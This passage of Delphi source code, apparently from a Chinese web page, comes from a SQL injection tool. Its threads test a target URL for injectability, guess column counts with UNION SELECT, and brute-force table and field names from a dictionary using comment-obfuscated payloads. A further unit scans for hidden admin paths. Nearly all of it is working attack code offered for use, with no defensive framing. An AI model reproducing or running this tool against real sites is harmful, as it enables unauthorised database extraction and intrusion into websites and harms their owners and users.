try
for i:=M to lsbDict.Count-1 do
begin
if scanManager.FreeOnTerminate then
begin
scanManager.Suspend;
scanManager.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
except
end; }
end;
procedure TForm1.ListBox1Click(Sender: TObject);
begin
wb.Navigate(ListBox1.Items.GetText);
pcPHPInj.ActivePageIndex :=3;
end;
procedure TForm1.FormShow(Sender: TObject);
begin
pg1 :=TProgressBar.Create(nil);
pg1.Parent :=StatusBar1;
pg1.Height :=StatusBar1.Height;
pg1.Width :=StatusBar1.Width;
pg1.Visible :=False;
end;
end.
unit Unit2;
interface
uses
Classes,StdCtrls,Windows,SysUtils,ComCtrls,IdHTTP;
var
CS:TRTLCriticalSection; //定义全局临界区
type
//扫描网站是否可以注入及当前注入点对应表字段数线程类
scanThread = class(TThread)
protected
FUrl,InjUrl,FStr: string; //要注入的网站地址
FKeyWord: string; //关键字
FState: boolean;
FMemo: TMemo;
FListView: TListView;
FNum: Integer;
FTable,FValue :string;
procedure Execute; override;
public
//constructor Create(Url,KeyWord:string;Memo:TMemo);
end;
//扫描表段注入线程类
scanTableThread = class(scanThread)
private
procedure scanTableResult;
protected
procedure Execute; override;
public
constructor Create(Url,Str,KeyWord:String;Memo:TMemo;ListView:TListView);
end;
//扫描字段注入线程类
scanFieldThread = class(scanThread)
private
procedure scanFieldResult;
protected
procedure Execute; override;
public
constructor Create(Url,Str,KeyWord,Table:String;Num:integer;Memo:TMemo;ListView:TListView);
end;
function Get(URL,Key: string): boolean;
var
stoped:boolean;
implementation
uses Unit1;
function Get(URL,Key: string): boolean;
var
IDHTTP: TIDHttp;
ss: String;
begin
Result:= False;
IDHTTP:= TIDHTTP.Create(nil);
try
try
idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错
idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问
ss:= IDHTTP.Get(URL);
if Key='''''''' then
begin
if IDHTTP.ResponseCode=200 then
Result :=true;
end else
begin
if (IDHTTP.ResponseCode=200) and (pos(Key,ss)>0) then
Result :=true;
end;
except
end;
finally
IDHTTP.Free;
end;
end;
{constructor scanThread.Create(Url,KeyWord:string;Memo:TMemo);
begin
FMemo :=Memo;
FUrl :=Url;
FKeyWord :=KeyWord;
FreeOnTerminate := True; // 自动删除
inherited Create(False); // 直接运行
end;}
procedure scanThread.Execute;
var
i:integer;
iStr:string;
begin
FMemo :=Form1.MM;
FUrl :=trim(Form1.EdtInjUrl.Text);
FKeyWord :=trim(Form1.EdtKey.Text);
FMemo.Lines.Clear;
FMemo.Lines.Add(''''正在检测注入点是否可用。。。'''');
if (not Get(FUrl,'''''''')) or (not Get(FUrl+''''/**/and/**/1=1/*'''',''''''''))
or (not Get(FUrl+''''/**/and/**/1=2/*'''','''''''')) then
begin
FMemo.Lines.Add(''''注入点不可用,猜解终止!'''');
exit;
end;
//开始猜解字段数目
i:=1;
iStr:=''''1'''';
FState :=False;
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''开始猜解字段数目。。。'''');
FMemo.Lines.Add('''''''');
while not FState do
begin
inc(i);
if i>30 then
begin
FMemo.Lines.Add(''''最大猜解字段数大于30,猜解终止!'''');
FState :=True;
exit;
end;
iStr:=iStr+'''',''''+IntToStr(i);
InjUrl :=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+''''/*'''';
FMemo.Lines.Add(InjUrl);
if Get(InjUrl,FKeyWord) then
begin
FState :=True;
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''字段数目猜解结束!共找到''''+IntToStr(i)+''''个字段。'''');
Form1.EdtFieldNum.Text :=IntToStr(i);
Form1.spNum.MaxValue :=i;
Form1.spNum.Text :=IntToStr(i);
Form1.spField1.MaxValue :=i;
Form1.spField2.MaxValue :=i;
exit;
end;
end;
end;
constructor scanTableThread.Create(Url,Str,KeyWord:String;Memo:TMemo;ListView:TListView);
begin
FListView :=ListView;
FMemo :=Memo;
FUrl :=Url;
FKeyWord :=KeyWord;
FStr :=Str;
FreeOnTerminate := True; // 自动删除
InitializeCriticalSection(CS); //初始化临界区
//inherited Create(FUrl,FKeyWord,FMemo); // 直接运行
inherited Create(False);
end;
procedure scanTableThread.scanTableResult;
begin
with FListView.Items.Add do
begin
Caption :=IntToStr(FListView.Items.Count);
SubItems.Add(FValue);
end;
end;
//在一个线程内完成表段猜解工作
procedure scanTableThread.Execute;
var i:integer;
begin
stoped :=False;
with Form1 do
begin
pg1.Min :=0;
pg1.Max :=Form1.lsbDict.Count;
pg1.Step :=1;
pg1.Position :=0;
pg1.Visible :=true;
end;
EnterCriticalSection(cs); //进入临界区
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''开始猜解表段。。。'''');
FMemo.Lines.Add('''''''');
for i:=0 to Form1.lsbDict.Count-1 do
begin
if stoped then
begin
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''表段猜解结束。。。'''');
Form1.pg1.Visible :=False;
exit;
end;
FValue :=Form1.lsbDict.Items;
if FValue='''''''' then Continue;
InjUrl :=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+FStr+''''/**/from/**/''''+FValue+''''/*'''';
FMemo.Lines.Add(InjUrl);
Form1.pg1.StepIt;
if Get(InjUrl,FKeyWord) then
begin
Synchronize(scanTableResult); //同步
end;
end;
FMemo.Lines.Add('''''''');
FMemo.Lines.Add(''''表段猜解结束。。。'''');
Form1.pg1.Visible :=False;
LeaveCriticalSection(CS); //退出临界区
sleep(20); // 线程挂起;
end;
//创建多个线程完成字段猜解
constructor scanFieldThread.Create(Url,Str,KeyWord,Table:String;Num:integer;Memo:TMemo;ListView:TListView);
begin
FListView :=ListView;
FMemo :=Memo;
FUrl :=Url;
FKeyWord :=KeyWord;
FStr :=Str;
FTable :=Table;
FNum :=Num;
FreeOnTerminate := True; // 自动删除
InitializeCriticalSection(CS); //初始化临界区
//inherited Create(FUrl,FKeyWord,FMemo); // 直接运行
inherited Create(False);
end;
procedure scanFieldThread.scanFieldResult;
begin
with FListView.Items.Add do
begin
Caption :=IntToStr(FListView.Items.Count);
SubItems.Add(FValue);
end;
end;
procedure scanFieldThread.Execute;
var
i:integer;
TmpStr:string;
begin
FValue :=Form1.lsbDict.Items[FNum];
TmpStr :=StringReplace(FStr,''''&FIELDNAME&'''',FValue,[rfIgnoreCase]);
InjUrl:=FUrl+''''/**/and/**/1=1/**/union/**/select/**/''''+TmpStr+''''/**/from/**/''''+FTable+''''/*'''';
EnterCriticalSection(cs); //进入临界区
FMemo.Lines.Add(InjUrl);
if Get(InjUrl,FKeyWord) then
begin
Synchronize(scanFieldResult); //同步
end;
LeaveCriticalSection(CS); //退出临界区
sleep(20); // 线程挂起;
end;
end.
//后台管理扫描线程类
unit Unit3;
interface
uses
Classes,StdCtrls,Windows,SysUtils,ComCtrls,wininet;
var
CS:TRTLCriticalSection; //定义全局临界区
type
scanManagerThread = class(TThread)
private
Tmplbx :TListBox;
TmpMemo :TMemo;
TmpNum :integer;
TmpUrl :string;
Str :string;
procedure scanResult;
protected
procedure Execute; override;
public
constructor Create(Url:string; Num: integer;Lbx: TListBox;Memo:TMemo);
end;
implementation
uses Unit1;
constructor scanManagerThread.Create(Url:string; Num: integer;Lbx: TListBox;Memo:TMemo);
begin
TmpUrl :=Url;
TmpNum :=Num; // 传递参数
Tmplbx :=Lbx;
TmpMemo :=Memo;
FreeOnTerminate :=True; // 自动删除
InitializeCriticalSection(CS); //初始化临界区
inherited Create(False); // 直接运行
end;
//====================== 判断网址是否存在的函数 =======================
function CheckUrl(url: string; TimeOut: integer = 5000): boolean;
var
hSession, hfile, hRequest: hInternet;
dwindex, dwcodelen: dword;
dwcode: array[1..20] of char;
res: pchar;
re: integer;
Err1: integer;
j: integer;
begin
if pos(''''http://'''', lowercase(url)) = 0 then
url := ''''http://'''' + url;
Result := false;
InternetSetOption(hSession, Internet_OPTION_CONNECT_TIMEOUT, @TimeOut, 4);
hSession := InternetOpen(''''Mozilla/4.0'''', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
//设置超时
if assigned(hsession) then
begin
j := 1;
while true do
begin
hfile := InternetOpenUrl(hsession, pchar(url), nil, 0, INTERNET_FLAG_RELOAD, 0);
if hfile = nil then
begin
j := j + 1;
Err1 := GetLastError;
if j > 5 then break;
if (Err1 <> 12002) or (Err1 <> 12152) then break;
sleep(2);
end
else begin
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >> |
